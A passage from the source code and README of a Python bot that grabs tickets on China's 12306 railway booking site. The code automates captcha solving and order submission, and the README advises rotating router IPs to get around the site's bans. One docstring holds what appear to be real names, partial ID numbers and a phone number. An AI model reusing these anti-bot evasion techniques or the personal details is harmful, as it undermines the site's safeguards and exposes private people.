'wb') as img: img.write(base64.b64decode(result)) return result except OSError: print(u"验证码下载失败,可能ip被封或者文件写入没权限") if __name__ == '__main__': pass File: inter/GetQueueCount.py # coding=utf-8 import datetime import sys import time from collections import OrderedDict import wrapcache import TickerConfig from config.TicketEnmu import ticket from config.emailConf import sendEmail from config.serverchanConf import sendServerChan from config.urlConf import urls from inter.ConfirmSingleForQueue import confirmSingleForQueue from myException.ticketIsExitsException import ticketIsExitsException def conversion_int(str): return int(str) class getQueueCount: def __init__(self, session, is_need_code, ifShowPassCodeTime, set_type, station_dates, train_no, ticket_peoples, ticketInfoForPassengerForm, token, oldPassengerStr, passengerTicketStrList): self.station_dates = station_dates self.session = session self.is_need_code = is_need_code self.ifShowPassCodeTime = ifShowPassCodeTime self.set_type = set_type self.train_no = train_no self.ticket_peoples = ticket_peoples self.ticket_black_list = {} self.ticketInfoForPassengerForm = ticketInfoForPassengerForm self.token = token self.oldPassengerStr = oldPassengerStr self.passengerTicketStrList = passengerTicketStrList def data_par(self): """ 参数结构 自动提交代码接口-autoSubmitOrderRequest - 字段说明 - secretStr 车票代码 - train_date 乘车日期 - tour_flag 乘车类型 - purpose_codes 学生还是成人 - query_from_station_name 起始车站 - query_to_station_name 结束车站 - cancel_flag 默认2,我也不知道干嘛的 - bed_level_order_num 000000000000000000000000000000 - passengerTicketStr 乘客乘车代码 - oldPassengerStr 乘客编号代码 :return: """ if sys.version_info.major is 2: new_train_date = filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" ")) else: new_train_date = list(filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" "))) data = OrderedDict() data['train_date'] = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], ), data['train_no'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO']['train_no'], data['stationTrainCode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO'][ 'station_train_code'], data['seatType'] = self.set_type, data['fromStationTelecode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO'][ 'from_station'], data['toStationTelecode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO']['to_station'], data['leftTicket'] = self.ticketInfoForPassengerForm['leftTicketStr'], data['purpose_codes'] = self.ticketInfoForPassengerForm['purpose_codes'], data['train_location'] = self.ticketInfoForPassengerForm['train_location'], data['REPEAT_SUBMIT_TOKEN'] = self.token, return data def sendGetQueueCount(self): """ # 模拟查询当前的列车排队人数的方法 # 返回信息组成的提示字符串 :return: """ getQueueCountResult = self.session.httpClint.send(self.session.urls["getQueueCountUrl"], self.data_par()) if "status" in getQueueCountResult and getQueueCountResult["status"] is True: if "countT" in getQueueCountResult["data"]: ticket = getQueueCountResult["data"]["ticket"] ticket_split = sum(map(conversion_int, ticket.split(","))) if ticket.find(",") != -1 else ticket countT = getQueueCountResult["data"]["countT"] if int(ticket_split) is 0: wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"排队失败,当前余票数还剩: {ticket_split} 张") return print(u"排队成功, 你排在: {1}位, 当前余票还剩余: {0} 张".format(ticket_split, countT)) csf = confirmSingleForQueue(self.session, self.ifShowPassCodeTime, self.is_need_code, self.token, self.set_type, self.ticket_peoples, self.ticketInfoForPassengerForm, self.oldPassengerStr, self.passengerTicketStrList) csf.sendConfirmSingleForQueue() # else: # print(u"当前排队人数: {1} 当前余票还剩余:{0} 张,继续排队中".format(ticket_split, countT)) else: print(u"排队发现未知错误{0},将此列车 {1}加入小黑屋".format(getQueueCountResult, self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif "messages" in getQueueCountResult and getQueueCountResult["messages"]: print(u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋".format(getQueueCountResult["messages"][0], self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: if "validateMessages" in getQueueCountResult and getQueueCountResult["validateMessages"]: print(str(getQueueCountResult["validateMessages"])) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: print(u"未知错误 {0}".format("".join(getQueueCountResult))) class queryQueueByAfterNate: def __init__(self, session): """ 候补排队 :param session: """ self.session = session def sendQueryQueueByAfterNate(self): for i in range(10): queryQueueByAfterNateRsp = self.session.httpClint.send(urls.get("queryQueue")) if not queryQueueByAfterNateRsp.get("status"): print("".join(queryQueueByAfterNateRsp.get("messages")) or queryQueueByAfterNateRsp.get("validateMessages")) time.sleep(1) else: sendEmail(ticket.WAIT_ORDER_SUCCESS) sendServerChan(ticket.WAIT_ORDER_SUCCESS) raise ticketIsExitsException(ticket.WAIT_AFTER_NATE_SUCCESS) if __name__ == '__main__': new_train_date = list(filter(None, str(time.asctime(time.strptime("2019-10-07", "%Y-%m-%d"))).split(" "))) print(new_train_date) train_date = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], ) print(train_date) File: inter/AutoSubmitOrderRequest.py # coding=utf-8 import urllib from collections import OrderedDict from config.TicketEnmu import ticket from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn from inter.GetQueueCountAsync import getQueueCountAsync from inter.GetRandCode import getRandCode import TickerConfig class autoSubmitOrderRequest: """ 快读提交订单通道 """ def __init__(self, selectObj, secretStr, train_date, query_from_station_name, query_to_station_name, passengerTicketStr, oldPassengerStr, train_no, stationTrainCode, leftTicket, set_type,): self.set_type = set_type try: self.secretStr = urllib.unquote(secretStr) except AttributeError: self.secretStr = urllib.parse.unquote(secretStr) self.train_date = train_date self.query_from_station_name = query_from_station_name self.query_to_station_name = query_to_station_name self.passengerTicketStr = passengerTicketStr.rstrip("_{0}".format(self.set_type)) self.oldPassengerStr = oldPassengerStr self.session = selectObj self.train_no = train_no self.stationTrainCode = stationTrainCode self.leftTicket = leftTicket def data_par(self): """ 参数结构 自动提交代码接口-autoSubmitOrderRequest - 字段说明 - secretStr 车票代码 - train_date 乘车日期 - tour_flag 乘车类型 - purpose_codes 学生还是成人 - query_from_station_name 起始车站 - query_to_station_name 结束车站 - cancel_flag 默认2,我也不知道干嘛的 - bed_level_order_num 000000000000000000000000000000 - passengerTicketStr 乘客乘车代码 - oldPassengerStr 乘客编号代码 :return: """ data = OrderedDict() data["secretStr"] = self.secretStr data["train_date"] = self.train_date data["tour_flag"] = "dc" data["purpose_codes"] = "ADULT" data["query_from_station_name"] = TickerConfig.FROM_STATION data["query_to_station_name"] = TickerConfig.TO_STATION data["cancel_flag"] = 2 data["bed_level_order_num"] = "000000000000000000000000000000" data["passengerTicketStr"] = self.passengerTicketStr data["oldPassengerStr"] = self.oldPassengerStr return data def sendAutoSubmitOrderRequest(self): """ 请求下单接口 :return: """ urls = self.session.urls["autoSubmitOrderRequest"] data = self.data_par() autoSubmitOrderRequestResult = self.session.httpClint.send(urls, data) if autoSubmitOrderRequestResult and \ autoSubmitOrderRequestResult.get("status", False) and\ autoSubmitOrderRequestResult.get("httpstatus", False) == 200: requestResultData = autoSubmitOrderRequestResult.get("data", {}) if requestResultData: result = requestResultData.get("result", "") ifShowPassCode = requestResultData.get("ifShowPassCode", "N") ifShowPassCodeTime = int(requestResultData.get("ifShowPassCodeTime", "1000")) / float(1000) print(ticket.AUTO_SUBMIT_ORDER_REQUEST_C) g = getQueueCountAsync(session=self.session, train_no=self.train_no, stationTrainCode=self.stationTrainCode, fromStationTelecode=self.query_from_station_name, toStationTelecode=self.query_to_station_name, leftTicket=self.leftTicket, set_type=self.set_type, users=len(TickerConfig.TICKET_PEOPLES), station_dates=self.train_date, passengerTicketStr=self.passengerTicketStr, oldPassengerStr=self.oldPassengerStr, result=result, ifShowPassCodeTime=ifShowPassCodeTime, ) if ifShowPassCode == "Y": # 如果需要验证码 print(u"需要验证码") print(u"正在使用自动识别验证码功能") for i in range(3): randCode = getRandCode(is_auto_code=True, auto_code_type=2) checkcode = checkRandCodeAnsyn(self.session, randCode, "") if checkcode == 'TRUE': print(u"验证码通过,正在提交订单") data['randCode'] = randCode break else: print (u"验证码有误, {0}次尝试重试".format(i + 1)) print(u"验证码超过限定次数3次,放弃此次订票机会!") g.sendGetQueueCountAsync() else: print(ticket.AUTO_SUBMIT_ORDER_REQUEST_F) if autoSubmitOrderRequestResult.get("messages", ""): print("".join(autoSubmitOrderRequestResult.get("messages", ""))) elif autoSubmitOrderRequestResult.get("validateMessages", ""): print("".join(autoSubmitOrderRequestResult.get("validateMessages", ""))) File: inter/GetSuccessRate.py from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.SubmitOrderRequest import submitOrderRequestByAfterNate class getSuccessRate: def __init__(self, session, secretList): """ 获取成功信息 """ self.secretList = secretList self.session = session def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["successSecret"] = f"{self.secretList}#{ticker}" data["_json_att"] = "" return data def sendSuccessRate(self): successRateRsp = self.session.httpClint.send(urls.get("getSuccessRate"), self.data_apr()) if not successRateRsp.get("status"): print("".join(successRateRsp.get("messages")) or successRateRsp.get("validateMessages")) return flag = successRateRsp.get("data", {}).get("flag")[0] train_no = flag.get("train_no") print(f"准备提交候补订单,{flag.get('info')}") submit = submitOrderRequestByAfterNate(self.session, self.secretList, train_no) submit.sendSubmitOrderRequest() File: inter/CheckRandCodeAnsyn.py # coding=utf-8 class checkRandCodeAnsyn: def __init__(self, session, randCode, token): self.session = session self.randCode = randCode self.token = token def data_par(self): """ :return: """ data = { "randCode": self.randCode, "rand": "randp", "_json_att": "", "REPEAT_SUBMIT_TOKEN": self.token } return data def sendCheckRandCodeAnsyn(self): """ 下单验证码识别 :return: """ checkRandCodeAnsynUrl = self.session.urls["checkRandCodeAnsyn"] fresult = self.session.httpClint.send(checkRandCodeAnsynUrl, self.data_par()) # 校验验证码是否正确 return fresult['data']['msg'] File: inter/GetPassengerDTOs.py # coding=utf-8 import json from config.TicketEnmu import ticket from myException.PassengerUserException import PassengerUserException import wrapcache import TickerConfig class getPassengerDTOs: """ 获取乘客信息 :return: """ def __init__(self, selectObj, ticket_peoples=None, set_type=None, is_more_ticket_num=None): """ :param session: 登录实例 :param ticket_peoples: 乘客 :param set_type: 坐席 """ if ticket_peoples is None: ticket_peoples = [] self.session = selectObj self.ticket_peoples = ticket_peoples self.is_more_ticket_num = is_more_ticket_num self.set_type = set_type def sendGetPassengerDTOs(self): getPassengerDTOsResult = self.session.httpClint.send(self.session.urls["get_passengerDTOs"], json.dumps({"_json_att": ""})) if getPassengerDTOsResult.get("data", False) and getPassengerDTOsResult["data"].get("normal_passengers", False): normal_passengers = getPassengerDTOsResult['data']['normal_passengers'] _normal_passenger = [normal_passengers[i] for i in range(len(normal_passengers)) if normal_passengers[i]["passenger_name"] in self.ticket_peoples] return _normal_passenger if _normal_passenger else [normal_passengers[0]] # 如果配置乘车人没有在账号,则默认返回第一个用户 else: if getPassengerDTOsResult.get("data", False) and getPassengerDTOsResult['data'].get("exMsg", False): print(getPassengerDTOsResult['data'].get("exMsg", False)) elif getPassengerDTOsResult.get('messages', False): print(getPassengerDTOsResult.get('messages', False)) else: print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") # raise PassengerUserException(ticket.DTO_NOT_FOUND) def getPassengerTicketStr(self, set_type): """ 获取getPassengerTicketStr 提交对应的代号码 :param str: 坐席 :return: """ passengerTicketStr = { '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9, '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3, } return str(passengerTicketStr[set_type.replace(' ', '')]) def getPassengerTicketStrListAndOldPassengerStr(self, secretStr, secretList): """ 获取提交车次人内容格式 passengerTicketStr O,0,1,文贤平,1,43052419950223XXXX,15618715583,N_O,0,1,梁敏,1,43052719920118XXXX,,N oldPassengerStr 文贤平,1,43052719920118XXXX,1_梁敏,1,43052719920118XXXX,1 ps: 如果is_more_ticket打开了的话,那就是读取联系人列表里面前符合车次数量的前几个联系人 :return: """ passengerTicketStrList = [] oldPassengerStr = [] tickers = [] set_type = "" if wrapcache.get("user_info"): # 如果缓存中有联系人方式,则读取缓存中的联系人 user_info = wrapcache.get("user_info") print(u"使用缓存中查找的联系人信息") else: user_info = self.sendGetPassengerDTOs() wrapcache.set("user_info", user_info, timeout=9999999) if not user_info: raise PassengerUserException(ticket.DTO_NOT_IN_LIST) if len(user_info) < self.is_more_ticket_num: # 如果乘车人填错了导致没有这个乘车人的话,可能乘车人数会小于自动乘车人 self.is_more_ticket_num = len(user_info) if secretStr: set_type = self.getPassengerTicketStr(self.set_type) if self.is_more_ticket_num is 1: passengerTicketStrList.append( '0,' + user_info[0]['passenger_type'] + "," + user_info[0][ "passenger_name"] + "," + user_info[0]['passenger_id_type_code'] + "," + user_info[0]['passenger_id_no'] + "," + user_info[0]['mobile_no'] + ',N,' + user_info[0]["allEncStr"]) oldPassengerStr.append( user_info[0]['passenger_name'] + "," + user_info[0]['passenger_id_type_code'] + "," + user_info[0]['passenger_id_no'] + "," + user_info[0]['passenger_type'] + '_') else: for i in range(self.is_more_ticket_num): passengerTicketStrList.append( '0,' + user_info[i]['passenger_type'] + "," + user_info[i][ "passenger_name"] + "," + user_info[i]['passenger_id_type_code'] + "," + user_info[i][ 'passenger_id_no'] + "," + user_info[i]['mobile_no'] + ',N,' + user_info[i]["allEncStr"] + '_' + set_type) oldPassengerStr.append( user_info[i]['passenger_name'] + "," + user_info[i]['passenger_id_type_code'] + "," + user_info[i]['passenger_id_no'] + "," + user_info[i]['passenger_type'] + '_') elif secretList: """ 候补订单有多少个联系人,就候补多少个联系人了,没有优先提交之说 1#XXXX#1#***************77X#bf6ae40d3655ae7eff005ee21d95876b38ab97a8031b464bc2f74a067e3ec957; """ for user in user_info: tickers.append(f"1#{user['passenger_name']}#1#{user['passenger_id_no']}#{user['allEncStr']};") return { "passengerTicketStrList": set_type + "," + ",".join(passengerTicketStrList), "passengerTicketStrByAfterLate": "".join(tickers), "oldPassengerStr": "".join(oldPassengerStr), "code": ticket.SUCCESS_CODE, "set_type": set_type, "status": True, "user_info": user_info, } File: inter/LoginAysnSuggest.py # coding=utf-8 from config.urlConf import urls def loginAysnSuggest(session, username, password): """ 登录接口 ps: 不需要验证码 :return: """ loginAysnSuggestUrls = urls.get("loginAysnSuggest") data = { "loginUserDTO.user_name": username, "userDTO.password": password } loginAysnSuggestRsp = session.httpClint.send(urls=loginAysnSuggestUrls, data=data) if loginAysnSuggestRsp and loginAysnSuggestRsp.get("httpstatus") is 200 and loginAysnSuggestRsp.get("data", {}).get("loginCheck") == "Y": print(u"登录成功") else: print(u"登录失败, {0} {1}".format("".join(loginAysnSuggestRsp.get("messages")), loginAysnSuggestRsp.get("validateMessages"))) File: inter/GetRandCode.py # coding=utf-8 from PIL import Image from config.urlConf import urls from myUrllib.httpUtils import HTTPClient from verify.localVerifyCode import Verify import TickerConfig import os if TickerConfig.AUTO_CODE_TYPE == 2: v = Verify() def getRandCode(is_auto_code, auto_code_type, result): """ 识别验证码 :return: 坐标 """ try: if is_auto_code: if auto_code_type == 1: print(u"打码兔已关闭, 如需使用自动识别,请使用如果平台 auto_code_type == 2") return elif auto_code_type == 2: Result = v.verify(result) return codexy(Ofset=Result, is_raw_input=False) elif auto_code_type == 3: print("您已设置使用云打码,但是服务器资源有限,请尽快改为本地打码" if "CAPTCHALOCAL" not in os.environ else "已设置本地打码服务器") http = HTTPClient(0) Result = http.send(urls.get("autoVerifyImage"), {"imageFile": result}) if Result and Result.get("code") is 0: return codexy(Ofset=Result.get("data"), is_raw_input=False) else: img = Image.open('./tkcode.png') img.show() return codexy() except Exception as e: print(e) def codexy(Ofset=None, is_raw_input=True): """ 获取验证码 :return: str """ if is_raw_input: print(u""" ***************** | 1 | 2 | 3 | 4 | ***************** | 5 | 6 | 7 | 8 | ***************** """) print(u"验证码分为8个,对应上面数字,例如第一和第二张,输入1, 2 如果开启cdn查询的话,会冲掉提示,直接鼠标点击命令行获取焦点,输入即可,不要输入空格") print(u"如果是linux无图形界面,请使用自动打码,is_auto_code: True") print(u"如果没有弹出验证码,请手动双击根目录下的tkcode.png文件") Ofset = input(u"输入对应的验证码: ") if isinstance(Ofset, list): select = Ofset else: Ofset = Ofset.replace(",", ",") select = Ofset.split(',') post = [] offsetsX = 0 # 选择的答案的left值,通过浏览器点击8个小图的中点得到的,这样基本没问题 offsetsY = 0 # 选择的答案的top值 for ofset in select: if ofset == '1': offsetsY = 77 offsetsX = 40 elif ofset == '2': offsetsY = 77 offsetsX = 112 elif ofset == '3': offsetsY = 77 offsetsX = 184 elif ofset == '4': offsetsY = 77 offsetsX = 256 elif ofset == '5': offsetsY = 149 offsetsX = 40 elif ofset == '6': offsetsY = 149 offsetsX = 112 elif ofset == '7': offsetsY = 149 offsetsX = 184 elif ofset == '8': offsetsY = 149 offsetsX = 256 else: pass post.append(offsetsX) post.append(offsetsY) randCode = str(post).replace(']', '').replace('[', '').replace("'", '').replace(' ', '') print(u"验证码识别坐标为{0}".format(randCode)) return randCode File: inter/ConfirmHB.py from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.GetQueueCount import queryQueueByAfterNate class confirmHB: def __init__(self, secretList, session, tickerNo, jzdhDate): """ 人脸识别 """ self.secretList = secretList self.session = session self.passengerTicketStrByAfterLate = session.passengerTicketStrByAfterLate self.tickerNo = tickerNo self.jzdhDate = jzdhDate def data_apr(self): """ passengerInfo 1#XXXX#1#***************77X#bf6ae40d3655ae7eff005ee21d95876b38ab97a8031b464bc2f74a067e3ec957; jzParam 2019-08-31#19#00 hbTrain 5l000G177230,O# lkParam :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["passengerInfo"] = self.passengerTicketStrByAfterLate data["jzParam"] = self.jzdhDate data["hbTrain"] = f"{self.tickerNo},{ticker}#" data["lkParam"] = "" return data def sendChechFace(self): ChechFaceRsp = self.session.httpClint.send(urls.get("confirmHB"), self.data_apr()) if not ChechFaceRsp.get("status"): print("".join(ChechFaceRsp.get("messages")) or ChechFaceRsp.get("validateMessages")) return data = ChechFaceRsp.get("data") if not data.get("flag"): print(f"错误信息:{data.get('msg')}") return queue = queryQueueByAfterNate(self.session) queue.sendQueryQueueByAfterNate() File: inter/GetQueueCountAsync.py import TickerConfig []# coding=utf-8 import datetime import sys import time from collections import OrderedDict import wrapcache from inter.ConfirmSingleForQueueAsys import confirmSingleForQueueAsys class getQueueCountAsync: """ 排队 """ def __init__(self, session, train_no, stationTrainCode, fromStationTelecode, toStationTelecode, leftTicket, set_type, users, station_dates, passengerTicketStr, oldPassengerStr, result, ifShowPassCodeTime): self.train_no = train_no self.session = session self.stationTrainCode = stationTrainCode self.fromStationTelecode = fromStationTelecode self.toStationTelecode = toStationTelecode self.set_type = set_type self.leftTicket = leftTicket self.users = users self.station_dates = station_dates self.passengerTicketStr = passengerTicketStr self.oldPassengerStr = oldPassengerStr self.result = result self.ifShowPassCodeTime=ifShowPassCodeTime def data_par(self): """ - 字段说明 - train_date 时间 - train_no 列车编号,查询代码里面返回 - stationTrainCode 列车编号 - seatType 对应坐席 - fromStationTelecode 起始城市 - toStationTelecode 到达城市 - leftTicket 查询代码里面返回 - purpose_codes 学生还是成人 - _json_att 没啥卵用,还是带上吧 :return: """ if sys.version_info.major is 2: new_train_date = filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" ")) else: new_train_date = list(filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" "))) data = OrderedDict() data['train_date'] = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], time.strftime("%H:%M:%S", time.localtime(time.time())) ), data["train_no"] = self.train_no data["stationTrainCode"] = self.stationTrainCode data["seatType"] = self.set_type data["fromStationTelecode"] = self.fromStationTelecode data["toStationTelecode"] = self.toStationTelecode data["leftTicket"] = self.leftTicket data["purpose_codes"] = "ADULT" data["_json_att"] = "" return data def conversion_int(self, str): return int(str) def sendGetQueueCountAsync(self): """ 请求排队接口 :return: """ urls = self.session.urls["getQueueCountAsync"] data = self.data_par() getQueueCountAsyncResult = self.session.httpClint.send(urls, data) if getQueueCountAsyncResult.get("status", False) and getQueueCountAsyncResult.get("data", False): if "status" in getQueueCountAsyncResult and getQueueCountAsyncResult["status"] is True: if "countT" in getQueueCountAsyncResult["data"]: ticket_data = getQueueCountAsyncResult["data"]["ticket"] ticket_split = sum(map(self.conversion_int, ticket_data.split(","))) if ticket_data.find( ",") != -1 else ticket_data if int(ticket_split) is 0: # 增加余票数为0时,将车次加入小黑屋 wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"排队失败,当前余票数为{ticket_split}张") return print(u"排队成功, 当前余票还剩余: {0} 张".format(ticket_split)) c = confirmSingleForQueueAsys(session=self.session, passengerTicketStr=self.passengerTicketStr, oldPassengerStr=self.oldPassengerStr, result=self.result,) print(u"验证码提交安全期,等待{}MS".format(self.ifShowPassCodeTime)) time.sleep(self.ifShowPassCodeTime) c.sendConfirmSingleForQueueAsys() else: print(u"排队发现未知错误{0},将此列车 {1}加入小黑屋".format(getQueueCountAsyncResult, self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif "messages" in getQueueCountAsyncResult and getQueueCountAsyncResult["messages"]: print(u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋".format(getQueueCountAsyncResult["messages"][0], self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: if "validateMessages" in getQueueCountAsyncResult and getQueueCountAsyncResult["validateMessages"]: print(str(getQueueCountAsyncResult["validateMessages"])) File: myException/ticketNumOutException.py class ticketNumOutException(Exception): pass File: myException/UserPasswordException.py class UserPasswordException(Exception): pass File: myException/ticketConfigException.py class ticketConfigException(Exception): pass File: myException/__init__.py File: myException/ticketIsExitsException.py class ticketIsExitsException(Exception): pass File: myException/balanceException.py class balanceException(Exception): pass File: myException/PassengerUserException.py class PassengerUserException(Exception): pass File: tmp/__init__.py File: tmp/log/__init__.py
### 12306 购票小助手 #### python版本 - [ ] 2.7.10 - 2.7.15 - [x] 3.6 - 3.7.4 - [ ] 2.7.9 #### 已有功能 - [x] 自动打码 - [x] 自动登录 - [x] 准点预售和捡漏 - [x] 智能候补 - [x] 邮件通知 - [x] server酱通知 #### 依赖库 - 验证码目前可以本地识别,需要下载模型,放于项目根目录,全部代码来源于此项目 [传送门](https://github.com/zhaipro/easy12306),表示感谢 ``` 1. 模型下载链接:https://pan.baidu.com/s/1rS155VjweWVWIJogakechA 密码:bmlm 群里面也可以下载 2. git仓库下载:https://github.com/testerSunshine/12306model.git ``` - 自托管云打码服务器搭建:[12306_code_server](https://github.com/YinAoXiong/12306_code_server) - 如果大家有空闲的服务器,可搭建之后在这个 [issues](https://github.com/testerSunshine/12306/issues/446) 里面填入自己的服务器(请注意服务器安全!) - 项目依赖 [requirements.txt](requirements.txt) - 安装方法x: - root用户(避免多python环境产生问题): `pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt` - 非root用户(避免安装和运行时使用了不同环境): `pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt` - 许多windows的用户装不了tensorflow的话,可以适当降低版本或者升高版本都是可以的 ``` 1. tensorflow的兼容版本 1.14.0rc\1.14.0rc\1.15.0\1.15.0rc 以上版本都测试无问题 2. 如果pip代理的清华源无法下载,可以更换其他源解决此问题 ``` #### 项目使用说明 - 服务器启动: - 修改[配置](TickerConfig.py)文件 - 可以配置邮箱,配置邮箱的格式在[配置](TickerConfig.py)里面可以看到ex ``` # 测试邮箱和server酱是否可用, server酱测试的前提是server酱开关开启 # 可以配置server酱提醒(推荐)[配置教程](https://www.jianshu.com/p/8d10b5b9c4e3) # 用python3 还是python 完全取决于安装的时候配置的环境变量是否为python3,以下启动默认环境变量为python3 python3 run.py t ``` - 配置[配置](TickerConfig.py)文件的时候,需注意空格和遵循python语法格式 - 启动前请先筛选cdn,这点很`重要` ``` python3 run.py c ``` - 启动服务 ``` python3 run.py r ``` - 如果你不知道如何操作,下面的命令可能会帮助你 ``` python3 run.py -h —————————————————————————— sage: run.py [-h] operate positional arguments: operate r: 运行抢票程序, c: 过滤cdn, t: 测试邮箱和server酱,server酱 ``` - 如果你的服务器安装了docker与docker-compose, 那么你可以忽略上面的**所有**步骤,直接按以下步骤操作,即可开始抢票: - 前提条件: - 请确认你安装的docker版本为18.09及以上: `docker -v` - 请确认你安装的docker-compose版本为1.23.2及以上: `docker-compose -v` - 请根据自己需要修改好配置文件:`TickerConfig.py` - 请修改配置文件`TickerConfig.py`中的变量`AUTO_CODE_TYPE`和`HOST`,`AUTO_CODE_TYPE`改为`3`, HOST改为`"captcha:80"`(这里很重要,这是本地打码服务器的配置) - 运行命令: - 开始抢票:`docker-compose up --build -d` - 停止抢票:`docker-compose down` - 查看抢票log: `docker logs --follow ticket` #### 目录对应说明 - agency - cdn代理 - config - 项目配置 - verify - 自动打码 - init - 项目主运行目录 - inter - 接口 - myException - 异常 - myUrllib request网络请求库 #### 思路图 - ![image](uml/uml.png) #### 项目声明: - 本软件只供学习交流使用,勿作为商业用途,交流群号 - 1群:286271084(已满) - 2群:649992274(已满) - 3群:632501142(已满) - 4群: 606340519(已满) - 5群: 948526733(已满) - 7群: 660689659(已满) - 8群: 620629239(已满) - 6群: 608792930(未满) - 9群: 693035807(未满) - 请不要重复加群,一个群就可以了,把机会留给更多人 - **进群先看公告!!!进群先看公告!!!进群先看公告!!! 重要的事情说三遍** - 能为你抢到一张回家的票,是我最大的心愿 #### 日志列子 - 成功log,如果是购票失败的,请带上失败的log给我,我尽力帮你调,也可加群一起交流,程序只是加速买票的过程,并不一定能买到票 ``` 正在第355次查询 乘车日期: 2018-02-12 车次G4741,G2365,G1371,G1377,G1329 查询无票 代理设置 无 总耗时429ms 车次: G4741 始发车站: 上海 终点站: 邵阳 二等座:有 正在尝试提交订票... 尝试提交订单... 出票成功 排队成功, 当前余票还剩余: 359 张 正在使用自动识别验证码功能 验证码通过,正在提交订单 提交订单成功! 排队等待时间预计还剩 -12 ms 排队等待时间预计还剩 -6 ms 排队等待时间预计还剩 -7 ms 排队等待时间预计还剩 -4 ms 排队等待时间预计还剩 -4 ms 恭喜您订票成功,订单号为:EB52743573, 请立即打开浏览器登录12306,访问‘未完成订单’,在30分钟内完成支付! ``` #### 使用帮助(一些安装问题和使用反馈较多的问题): - 测试邮箱是否可用 [邮箱配置问题看issues](https://github.com/testerSunshine/12306/issues/107) - 学生票issues [学生票修改](https://github.com/testerSunshine/12306/issues/47) - 依赖安装不对的问题(ImportError)[requirements.txt问题](https://github.com/testerSunshine/12306/issues/91) - 若快豆子疑问 [点我](https://github.com/testerSunshine/12306/issues/67) - IOError: 【Errno 0】 Error 问题 [点我](https://github.com/testerSunshine/12306/issues/159) - 测试下单接口是否可用,有两个下单接口,随便用哪个都ok - 如果下载验证码过期或者下载失败的问题,应该是12306封ip的策略,多重试几次,12306现在封服务器(阿里云和腾讯云)ip比较严重,尽量不要放在服务器里面 - 目前12306对服务器ip比较敏感,大家还是在自己家里挂着吧 - 自动更换ip软件目前已支持TPLINK和小米路由器,只限家庭网络[点我跳转](https://github.com/testerSunshine/AutoRouterIP) #### 感谢一下小伙伴对本项目提供的帮助 - @[email protected] - @ 才 - @[MonsterTan](https://github.com/MonsterTan) - 以及所有为此项目提供pr的同学 #### 更新日志 - [更新日志](Update.md)
codellama
e81b597e44dbecc2a0dedb9949fdf84adfc22395
